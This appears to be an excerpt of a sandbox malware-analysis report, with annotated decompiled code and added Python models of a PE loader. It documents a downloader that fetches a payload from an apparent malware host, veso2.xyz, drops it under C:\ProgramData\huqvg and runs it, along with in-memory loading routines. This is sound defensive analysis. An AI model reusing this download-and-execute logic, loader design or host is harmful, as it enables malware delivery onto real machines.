    						_v28 = 0;
    						break;
    					}
    					return _v28;
    				}
    				return 1;
    			}
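E011918C0 is the loader's import-resolution step. It walks the IMAGE_IMPORT_DESCRIPTOR array of the mapped image, loads each named module through the loadLibrary callback kept at +0x1c of the loader state, then fills the first-thunk array (the IAT) from the getProcAddress callback at +0x20: an entry with bit 31 set is an import by ordinal, anything else points at a hint/name pair and is imported by name past the 2-byte hint. A module that cannot be loaded ends the walk with ERROR_MOD_NOT_FOUND (0x7e), an unresolvable symbol with ERROR_PROC_NOT_FOUND (0x7f). The Python below is an added example, not code from the report or from the sample: it performs the same walk over a constructed, hand-laid-out image in which RVAs equal offsets, with the real Win32 calls replaced by a fake export table so it runs anywhere. The descriptor and thunk RVAs, the fake addresses and the ordinal value are invented for the test.

```python
import struct

ERROR_MOD_NOT_FOUND = 0x7E
ERROR_PROC_NOT_FOUND = 0x7F
IMAGE_ORDINAL_FLAG32 = 0x80000000
IMPORT_DESCRIPTOR_SIZE = 0x14    # the size the sample probes with IsBadReadPtr


def read_cstr(image, offset):
    return bytes(image[offset:image.index(b"\0", offset)]).decode("ascii")


def resolve_imports(image, import_dir_rva, load_library, get_proc_address):
    """Walk the import directory of a flat, mapped image and patch its IATs in place.

    image is a bytearray laid out so that RVA == offset (the loader adds every
    RVA to its code base). Returns (True, loaded_module_handles) or
    (False, win32_error), mirroring the return value and SetLastError of the
    decompiled function.
    """
    loaded = []
    descriptor = import_dir_rva
    while descriptor + IMPORT_DESCRIPTOR_SIZE <= len(image):        # IsBadReadPtr stand-in
        original_first_thunk, _stamp, _forwarder, name_rva, first_thunk = \
            struct.unpack_from("<5I", image, descriptor)
        if name_rva == 0:                                            # the null descriptor ends the table
            break
        handle = load_library(read_cstr(image, name_rva))
        if handle is None:
            return False, ERROR_MOD_NOT_FOUND
        loaded.append(handle)                                        # the sample keeps these in a realloc'd array
        # Lookup entries come from the INT when one exists, otherwise from the IAT itself;
        # the resolved addresses always go into the IAT.
        thunk = original_first_thunk or first_thunk
        slot = first_thunk
        while True:
            entry = struct.unpack_from("<I", image, thunk)[0]
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                address = get_proc_address(handle, entry & 0xFFFF)  # import by ordinal
            else:
                address = get_proc_address(handle, read_cstr(image, entry + 2))  # skip the 2-byte hint
            if not address:
                return False, ERROR_PROC_NOT_FOUND
            struct.pack_into("<I", image, slot, address)
            thunk += 4
            slot += 4
        descriptor += IMPORT_DESCRIPTOR_SIZE
    return True, loaded


def iat_entry(image, rva):
    return struct.unpack_from("<I", image, rva)[0]


# Constructed stand-in for the real DLLs: handle -> {name or ordinal: made-up address}.
FAKE_EXPORTS = {
    "kernel32.dll": {"VirtualAlloc": 0x77001000, "GetProcAddress": 0x77001234},
    "ws2_32.dll": {23: 0x77102300},
}
IMPORT_DIR_RVA = 0x1000
IAT_KERNEL32 = 0x2200
IAT_WS2_32 = 0x2400


def fake_load_library(name):
    name = name.lower()
    return name if name in FAKE_EXPORTS else None


def fake_get_proc_address(handle, name_or_ordinal):
    return FAKE_EXPORTS[handle].get(name_or_ordinal, 0)


def build_test_image(kernel32_name=b"kernel32.dll", proc_name=b"VirtualAlloc"):
    """Constructed mapped image: two descriptors (one by-name, one by-ordinal import) and a null terminator."""
    image = bytearray(0x3000)
    image[0x2000:0x2000 + len(kernel32_name) + 1] = kernel32_name + b"\0"
    by_name = b"\0\0" + proc_name + b"\0"                            # IMAGE_IMPORT_BY_NAME: Hint, then Name
    image[0x2010:0x2010 + len(by_name)] = by_name
    image[0x2020:0x2020 + 11] = b"ws2_32.dll\0"
    struct.pack_into("<II", image, 0x2100, 0x2010, 0)                # kernel32 INT: by name, terminator
    struct.pack_into("<II", image, IAT_KERNEL32, 0x2010, 0)          # kernel32 IAT (same content before resolution)
    struct.pack_into("<II", image, 0x2300, IMAGE_ORDINAL_FLAG32 | 23, 0)  # ws2_32 INT: ordinal 23 (arbitrary)
    struct.pack_into("<II", image, IAT_WS2_32, IMAGE_ORDINAL_FLAG32 | 23, 0)
    struct.pack_into("<5I", image, IMPORT_DIR_RVA, 0x2100, 0, 0, 0x2000, IAT_KERNEL32)
    struct.pack_into("<5I", image, IMPORT_DIR_RVA + 0x14, 0x2300, 0, 0, 0x2020, IAT_WS2_32)
    return image                                                     # the third descriptor stays zero


if __name__ == "__main__":
    img = build_test_image()
    print(resolve_imports(img, IMPORT_DIR_RVA, fake_load_library, fake_get_proc_address))
    print(hex(iat_entry(img, IAT_KERNEL32)), hex(iat_entry(img, IAT_WS2_32)))
```

Run against a memory dump of the mapped region (with `load_library` and `get_proc_address` replaced by lookups into the dump's own loaded-module list) the same walk recovers which APIs the second stage binds, which is the information the static import table of 4123.dll deliberately does not carry.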


    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0119191C
    • SetLastError.KERNEL32(0000007E), ref: 0119195E
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 3a3e4703c0d9aa02f2546af26afa45898850dd98e0b19a27ca1735b162736dce
    • Instruction ID: 44b99df1bf7e286b473ec26535e2231c30da42c8fba062804f9137289d70601e
    • Opcode Fuzzy Hash: 3a3e4703c0d9aa02f2546af26afa45898850dd98e0b19a27ca1735b162736dce
    • Instruction Fuzzy Hash: F3819974A00209EFDB08CF98C584AAEBBB1FF48364F148158E959AB355D774AE81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 268 11b10b0-11b10ed call 11b1640 270 11b10f2-11b110a 268->270 271 11b110c-11b1121 270->271 272 11b1124-11b114b call 11b1640 270->272 271->272 276 11b114d-11b116c call 11b1350 Sleep call 11b12b0 272->276 277 11b1171-11b119a call 11b1a04 272->277 276->277
    C-Code - Quality: 49%
    			E011B10B0(void* __eflags) { // stage-1 download, stage-2 download, drop and run
    				signed int _v8;
    				void _v36;
    				void _v68;
    				signed char* _v72;
    				signed char* _v76;
    				char _v80;
    				char _v84;
    				signed char* _t28;
    				signed char* _t30;
    				void* _t34;
    				signed char* _t46;
    				signed int _t71;
    				void* _t72;
    				void* _t75;
    				void* _t76;
    				void* _t80;
    
    				_t80 = __eflags;
    				_v8 =  *0x11b3004 ^ _t71; // stack cookie
    				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2); // stage-1 URL assembled on the stack (28 bytes plus the movsw/movsb tail)
    				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2); // drop path
    				asm("movsw");
    				asm("movsb");
    				_t28 = E011B1640(_t80,  &_v36,  &_v84, 1); // executed; E011B1640 is the HTTP fetch (wsprintfA/WSAStartup, see APIs below) and apparently returns the reply buffer with its length in _v84
    				_t75 = _t72 + 0x24;
    				_v72 = _t28;
    				_t46 = _v72;
    				_t81 = ( *_t46 & 0x000000ff) - 0x68;
    				if(( *_t46 & 0x000000ff) != 0x68) { // stage-1 reply must start with 'h', i.e. it is expected to be a second URL
    					 *0x11b3008(_v72); // IAT slot; used like free() (inference from the arguments)
    					 *0x11b3020(1); // IAT slot; used like exit(1) (inference)
    					_t75 = _t75 + 8;
    				}
    				_t30 = E011B1640(_t81, _v72,  &_v80, 1); // stage 2: fetch the URL that stage 1 returned
    				_t76 = _t75 + 0xc;
    				_v76 = _t30;
    				if(( *_v76 & 0x000000ff) == 0x4d) { // 'M': the payload is only accepted if it looks like a PE image ("MZ")
    					E011B1350(_v76, _v80,  &_v68); // presumably writes _v80 bytes of payload to C:\ProgramData\huqvg\huqvg.exe
    					_t76 = _t76 + 0xc;
    					Sleep(0x3a98); // 15 000 ms
    					E011B12B0(); // starts the dropped file (see E011B12B0 below)
    				}
    				 *0x11b3008(_v76);
    				_t34 =  *0x11b3008(_v72);
    				E011B1A04(); // stack-cookie check (likely __security_check_cookie)
    				return _t34;
    			}
    
    0x011b10b0
    0x011b10bd
    0x011b10cf
    0x011b10de
    0x011b10e0
    0x011b10e2
    0x011b10ed
    0x011b10f2
    0x011b10f5
    0x011b1100
    0x011b1107
    0x011b110a
    0x011b1110
    0x011b111b
    0x011b1121
    0x011b1121
    0x011b112e
    0x011b1133
    0x011b1136
    0x011b114b
    0x011b1159
    0x011b115e
    0x011b1166
    0x011b116c
    0x011b116c
    0x011b1175
    0x011b1182
    0x011b1192
    0x011b119a

    APIs
      • Part of subcall function 011B1640: wsprintfA.USER32 ref: 011B173A
      • Part of subcall function 011B1640: WSAStartup.WS2_32(00000102,?), ref: 011B174F
    • Sleep.KERNEL32(00003A98), ref: 011B1166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 011B10C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 011B10D6
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: e7d2cb97b0cb01da27fa2c8a99e5a13aaf8a024fa461621dfa001970e00185b0
    • Instruction ID: 2644057d594e1b96c62770c71c6d60c044a97d76384809efa50eea62534cc6c6
    • Opcode Fuzzy Hash: e7d2cb97b0cb01da27fa2c8a99e5a13aaf8a024fa461621dfa001970e00185b0
    • Instruction Fuzzy Hash: 6D21C7B1E00108ABDB18DBA8E895ADFBB79FF48304F144038E515AB240D775B955C791
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 286 11b1040-11b1092 CreateDirectoryA 287 11b1098 286->287 288 11b1094-11b1096 286->288 289 11b109a-11b10a7 call 11b1a04 287->289 288->289
    C-Code - Quality: 100%
    			E011B1040() { // creates the drop directory C:\ProgramData\huqvg
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _t12;
    				char _t13;
    				int _t15;
    				void* _t16;
    				char _t17;
    				intOrPtr _t18;
    				char _t21;
    				char _t22;
    				signed int _t23;
    
    				_v8 =  *0x11b3004 ^ _t23; // stack cookie
    				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43 -- the path is built on the stack four bytes at a time ("C:\P", "rogr", ...)
    				_v32 = _t12;
    				_t17 = "rogramData\\huqvg"; // 0x72676f72
    				_v28 = _t17;
    				_t21 = "amData\\huqvg"; // 0x61446d61
    				_v24 = _t21;
    				_t13 = "ta\\huqvg"; // 0x685c6174
    				_v20 = _t13;
    				_t18 =  *0x11b2110; // 0x67767175 ("uqvg")
    				_v16 = _t18;
    				_t22 =  *0x11b2114; // 0x0 (terminator)
    				_v12 = _t22;
    				_t15 = CreateDirectoryA( &_v32, 0); // executed; no security descriptor, so the directory inherits the permissive ProgramData ACL
    				if(_t15 == 0) {
    					_t16 = 0;
    				} else {
    					_t16 = 1;
    				}
    				E011B1A04(); // stack-cookie check
    				return _t16;
    			}
    
    0x011b104d
    0x011b1050
    0x011b1055
    0x011b1058
    0x011b105e
    0x011b1061
    0x011b1067
    0x011b106a
    0x011b106f
    0x011b1072
    0x011b1078
    0x011b107b
    0x011b1081
    0x011b108a
    0x011b1092
    0x011b1098
    0x011b1094
    0x011b1094
    0x011b1094
    0x011b109f
    0x011b10a7

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,011B12A3), ref: 011B108A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 7fc04c9c890db92ebd4aa4568dc63b7bcfd8a7f16f5c79869a81c90a0ab14fcc
    • Instruction ID: 0adb0d2b3c5bd1a3d4ded13d56f2461ccd8c99b20bcdab5b3ea3f398c1d71526
    • Opcode Fuzzy Hash: 7fc04c9c890db92ebd4aa4568dc63b7bcfd8a7f16f5c79869a81c90a0ab14fcc
    • Instruction Fuzzy Hash: 8A013C78E042499FCB1CCFA9E1D16AEBBF8FB1D200B10406ADA25A3344D7346A48CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 292 1191460-1191470 293 119147c-1191488 292->293 294 1191472-1191477 292->294 296 119148a-1191495 293->296 297 11914e4-11914f0 293->297 295 11915aa-11915ad 294->295 300 11914da-11914df 296->300 301 1191497-119149e 296->301 298 11914fb 297->298 299 11914f2-11914f9 297->299 302 1191502-1191514 298->302 299->302 300->295 303 11914a0-11914ae 301->303 304 11914c2-11914d4 VirtualFree 301->304 305 119151f 302->305 306 1191516-119151d 302->306 303->304 307 11914b0-11914c0 303->307 304->300 308 1191526-1191538 305->308 306->308 307->300 307->304 309 119153a-1191541 308->309 310 1191543 308->310 311 119154a-1191574 309->311 310->311 312 1191582-119159f VirtualProtect 311->312 313 1191576-119157f 311->313 314 11915a1-11915a3 312->314 315 11915a5 312->315 313->312 314->295 315->295
    C-Code - Quality: 100%
    			E01191460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) { // finalize one mapped section; _a4: loader context (*_a4 -> IMAGE_NT_HEADERS, +0x30 page size); _a8: {address, alignedAddress, size, characteristics, last}
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				long _v40;
    				int _t74;
    
    				_v36 = __ecx;
    				if(_a8[2] != 0) { // size == 0: nothing to do
    					if((_a8[3] & 0x02000000) == 0) { // not IMAGE_SCN_MEM_DISCARDABLE: set the final page protection
    						if((_a8[3] & 0x20000000) == 0) { // IMAGE_SCN_MEM_EXECUTE
    							_v12 = 0;
    						} else {
    							_v12 = 1;
    						}
    						_v24 = _v12;
    						if((_a8[3] & 0x40000000) == 0) { // IMAGE_SCN_MEM_READ
    							_v16 = 0;
    						} else {
    							_v16 = 1;
    						}
    						_v28 = _v16;
    						if((_a8[3] & 0x80000000) == 0) { // IMAGE_SCN_MEM_WRITE
    							_v20 = 0;
    						} else {
    							_v20 = 1;
    						}
    						_v32 = _v20;
    						_t48 = _v28 * 8; // 0x2327118
    						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x1195a00 + _v32 * 4)); // 2x2x2 table of PAGE_* values at 0x1195a00, indexed [execute][read][write]
    						if((_a8[3] & 0x04000000) != 0) { // IMAGE_SCN_MEM_NOT_CACHED
    							_v8 = _v8 | 0x00000200; // PAGE_NOCACHE
    						}
    						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed
    						if(_t74 != 0) {
    							return 1;
    						} else {
    							return 0;
    						}
    					}
    					if( *_a8 != _a8[1]) { // discardable section that does not start on a page boundary: leave it mapped
    						L8:
    						return 1;
    					}
    					if(_a8[4] != 0) { // last section: safe to decommit
    						L7:
    						VirtualFree( *_a8, _a8[2], 0x4000); // executed; MEM_DECOMMIT the discardable section
    						goto L8;
    					}
    					_t14 = _a4 + 0x30; // 0x0
    					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) { // OptionalHeader.SectionAlignment == page size, or the size is a whole number of pages, so no neighbour shares the last page
    						goto L7;
    					} else {
    						goto L8;
    					}
    				}
    				return 1;
    			}
    
    0x01191466
    0x01191470
    0x01191488
    0x011914f0
    0x011914fb
    0x011914f2
    0x011914f2
    0x011914f2
    0x01191505
    0x01191514
    0x0119151f
    0x01191516
    0x01191516
    0x01191516
    0x01191529
    0x01191538
    0x01191543
    0x0119153a
    0x0119153a
    0x0119153a
    0x0119154d
    0x01191559
    0x01191566
    0x01191574
    0x0119157f
    0x0119157f
    0x01191597
    0x0119159f
    0x00000000
    0x011915a1
    0x00000000
    0x011915a1
    0x0119159f
    0x01191495
    0x011914da
    0x00000000
    0x011914da
    0x0119149e
    0x011914c2
    0x011914d4
    0x00000000
    0x011914d4
    0x011914ab
    0x011914ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011914ae
    0x00000000

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,01191718,01194000,?,01194000,00000000), ref: 011914D4
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 736f4e453990f8e213fa082cfd2cef6702f7b5cc1538a6ba9821d7d505220231
    • Instruction ID: 1bc97bbdbe5e4f1098041498a9df200a9fcb84808db464ec4b0e25de21cc698f
    • Opcode Fuzzy Hash: 736f4e453990f8e213fa082cfd2cef6702f7b5cc1538a6ba9821d7d505220231
    • Instruction Fuzzy Hash: 3541CB75A00209EFEB19CF48C494BA9B7B2FF88324F15C159E92A5F355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 316 11912a0-11912ce 317 11912e2-11912ee 316->317 318 11912f4-11912fb 317->318 319 11913e6 317->319 320 11912fd-119130a 318->320 321 1191363-119137e call 1191270 318->321 322 11913eb-11913ee 319->322 323 119130c-119132e VirtualAlloc 320->323 324 119135e 320->324 331 1191380-1191382 321->331 332 1191384-11913a9 VirtualAlloc 321->332 326 1191330-1191332 323->326 327 1191337-119135b call 1191080 323->327 324->317 326->322 327->324 331->322 333 11913ab-11913ad 332->333 334 11913af-11913de call 11910d0 332->334 333->322 334->319
    C-Code - Quality: 100%
    			E011912A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) { // copy sections into the mapped image; _a4: raw file image, _a8: its size, _a12: original IMAGE_NT_HEADERS, _a16: loader context (*_a16 -> mapped headers, +4 code base)
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				long _v24;
    				intOrPtr _v28;
    				void* _t76;
    				void* _t127;
    
    				_v28 = __ecx;
    				_t3 = _a16 + 4; // 0xf5e9
    				_v16 =  *_t3; // code base
    				_t7 =  *_a16 + 0x14; // 0x508bf84d; FileHeader.SizeOfOptionalHeader
    				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x1191e76
    				_v8 =  *_a16 + _t9; // first IMAGE_SECTION_HEADER (same arithmetic as IMAGE_FIRST_SECTION)
    				_v20 = 0;
    				while(1) {
    					_t17 =  *_a16 + 6; // 0xe9000000; FileHeader.NumberOfSections
    					if(_v20 >= ( *_t17 & 0x0000ffff)) {
    						break;
    					}
    					if( *(_v8 + 0x10) != 0) { // SizeOfRawData
    						if(E01191270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) { // PointerToRawData + SizeOfRawData must lie inside the file image
    							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed; MEM_COMMIT, PAGE_READWRITE at code base + VirtualAddress
    							_v12 = _t76;
    							if(_v12 != 0) {
    								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    								E011910D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10)); // memcpy-like: raw section bytes into the committed range
    								_t127 = _t127 + 0xc;
    								 *((intOrPtr*)(_v8 + 8)) = _v12; // Misc.PhysicalAddress reused to remember where the section was mapped
    								L1:
    								_v20 = _v20 + 1;
    								_v8 = _v8 + 0x28; // sizeof(IMAGE_SECTION_HEADER)
    								continue;
    							}
    							return 0;
    						}
    						return 0;
    					}
    					_v24 =  *((intOrPtr*)(_a12 + 0x38)); // OptionalHeader.SectionAlignment: amount committed for a section with no raw data (.bss style)
    					if(_v24 <= 0) {
    						L8:
    						goto L1;
    					}
    					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4);
    					if(_v12 != 0) {
    						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    						 *((intOrPtr*)(_v8 + 8)) = _v12;
    						E01191080(_v12, 0, _v24); // memset-like: zero-fill
    						_t127 = _t127 + 0xc;
    						goto L8;
    					}
    					return 0;
    				}
    				return 1;
    			}
    
    0x011912a6
    0x011912ac
    0x011912af
    0x011912bc
    0x011912c0
    0x011912c4
    0x011912c7
    0x011912e2
    0x011912e7
    0x011912ee
    0x00000000
    0x00000000
    0x011912fb
    0x0119137e
    0x0119139c
    0x011913a2
    0x011913a9
    0x011913b8
    0x011913d0
    0x011913d5
    0x011913de
    0x011912d0
    0x011912d6
    0x011912df
    0x00000000
    0x011912df
    0x00000000
    0x011913ab
    0x00000000
    0x01191380
    0x01191303
    0x0119130a
    0x0119135e
    0x00000000
    0x0119135e
    0x01191327
    0x0119132e
    0x01191340
    0x01191349
    0x01191356
    0x0119135b
    0x00000000
    0x0119135b
    0x00000000
    0x01191330
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 01191321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,01191E5E), ref: 0119139C
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: cc0f37f7cd9fca80dcdc6e20672d933aabd4cfde5e50e9a2d97e381d2398f6f2
    • Instruction ID: fc17d52716a5ab1e7e837d6babf72a5493e6edf11659a6d31aeee3fee0a8024b
    • Opcode Fuzzy Hash: cc0f37f7cd9fca80dcdc6e20672d933aabd4cfde5e50e9a2d97e381d2398f6f2
    • Instruction Fuzzy Hash: 1551DA74E0420AEFCB08CF98C580AAEB7B1FF48314F248598E915AB345D371EE91DB95
    Uniqueness

    Uniqueness Score: -1.00%

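Added worked example (editor's note; this is not Joe Sandbox output and not code recovered from the sample): a Python model of the two section stages decompiled above, E011912A0 (commit and copy each section at code base + VirtualAddress, or commit and zero SectionAlignment bytes when SizeOfRawData is 0) and E01191460 (decommit discardable sections that can safely be released, otherwise translate the IMAGE_SCN_MEM_* bits into a PAGE_* value through an [execute][read][write] table). The 2x2x2 table at 0x1195a00 is not dumped on this page; the PROTECTION_FLAGS layout below is an assumption taken from the MemoryModule ProtectionFlags table that this arithmetic matches. The section table, the image base 0x10000000 and the raw offsets are constructed for the example.

```python
import struct

# IMAGE_SECTION_HEADER.Characteristics bits tested by E01191460 and E011912A0
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_NOT_CACHED = 0x04000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
PAGE_NOCACHE, MEM_COMMIT, MEM_DECOMMIT = 0x200, 0x1000, 0x4000

# Assumed contents of the table at 0x1195a00, indexed [execute][read][write]; the page does
# not dump it, this is the MemoryModule ProtectionFlags layout the index arithmetic matches.
PROTECTION_FLAGS = [
    [[PAGE_NOACCESS, PAGE_WRITECOPY], [PAGE_READONLY, PAGE_READWRITE]],
    [[PAGE_EXECUTE, PAGE_EXECUTE_WRITECOPY], [PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE]],
]

IMAGE_SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # 40 bytes; E011912A0 steps by 0x28


def build_section_header(name, va, raw_size, characteristics, raw_ptr=0x400):
    """Constructed section header for the sample table below (not from the analysed DLL)."""
    return IMAGE_SECTION_HEADER.pack(name.encode().ljust(8, b"\0"), raw_size, va, raw_size,
                                     raw_ptr, 0, 0, 0, 0, characteristics)


def parse_section_header(raw):
    name, _vsize, va, raw_size, raw_ptr, *_rest, chars = IMAGE_SECTION_HEADER.unpack(raw)
    return {"name": name.rstrip(b"\0").decode(), "va": va, "raw_size": raw_size,
            "raw_ptr": raw_ptr, "characteristics": chars}


def copy_section_plan(code_base, header, section_alignment):
    """What E011912A0 does per section: VirtualAlloc(code_base + VirtualAddress, ..., MEM_COMMIT,
    PAGE_READWRITE) then copy SizeOfRawData bytes from PointerToRawData; with SizeOfRawData == 0
    it commits SectionAlignment bytes and zero-fills them instead."""
    dest = code_base + header["va"]
    if header["raw_size"] == 0:
        return ("zero", dest, section_alignment)
    return ("copy", dest, header["raw_size"], header["raw_ptr"])


def protection_for(characteristics):
    """Replicates (_v24 << 4) + _v28 * 8 + _v32 * 4 in E01191460 plus the PAGE_NOCACHE branch."""
    e = 1 if characteristics & IMAGE_SCN_MEM_EXECUTE else 0
    r = 1 if characteristics & IMAGE_SCN_MEM_READ else 0
    w = 1 if characteristics & IMAGE_SCN_MEM_WRITE else 0
    prot = PROTECTION_FLAGS[e][r][w]
    if characteristics & IMAGE_SCN_MEM_NOT_CACHED:
        prot |= PAGE_NOCACHE  # the `_v8 | 0x200` branch
    return prot


def finalize_section(address, aligned_address, size, characteristics, last,
                     section_alignment, page_size):
    """Decision tree of E01191460 for one section (arguments follow its _a8[0..4] layout)."""
    if size == 0:
        return ("skip",)
    if characteristics & IMAGE_SCN_MEM_DISCARDABLE:
        # only release a page-aligned range whose last page cannot be shared with a neighbour
        if address == aligned_address and (last or section_alignment == page_size
                                           or size % page_size == 0):
            return ("decommit", address, size, MEM_DECOMMIT)
        return ("keep",)
    return ("protect", address, size, protection_for(characteristics))


def plan_sections(code_base, headers_raw, section_alignment=0x1000, page_size=0x1000):
    """Run both stages over a section table; one (name, copy_action, finalize_action) per section."""
    n = len(headers_raw) // IMAGE_SECTION_HEADER.size
    rows = []
    for i in range(n):
        h = parse_section_header(headers_raw[i * IMAGE_SECTION_HEADER.size:(i + 1) * IMAGE_SECTION_HEADER.size])
        copy = copy_section_plan(code_base, h, section_alignment)
        size = h["raw_size"] or section_alignment  # simplification: real loaders consult SizeOfUninitializedData
        addr = code_base + h["va"]
        fin = finalize_section(addr, addr & ~(page_size - 1), size, h["characteristics"],
                               i == n - 1, section_alignment, page_size)
        rows.append((h["name"], copy, fin))
    return rows


# Constructed section table with the usual .text/.rdata/.data/.bss/.reloc characteristics.
SAMPLE_HEADERS = b"".join([
    build_section_header(".text", 0x1000, 0x2000, 0x60000020),
    build_section_header(".rdata", 0x3000, 0x1000, 0x40000040),
    build_section_header(".data", 0x4000, 0x1000, 0xC0000040),
    build_section_header(".bss", 0x5000, 0, 0xC0000080),
    build_section_header(".reloc", 0x6000, 0x200, 0x42000040),
])

if __name__ == "__main__":
    for row in plan_sections(0x10000000, SAMPLE_HEADERS):  # hypothetical image base
        print(row)
```

The .reloc row ends in a decommit because it is the last section and starts on a page boundary; move it before .data in the constructed table and the same bits yield "keep", which is the case the modulo check in E01191460 exists for.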
    Control-flow Graph

    • Executed
    • Not Executed
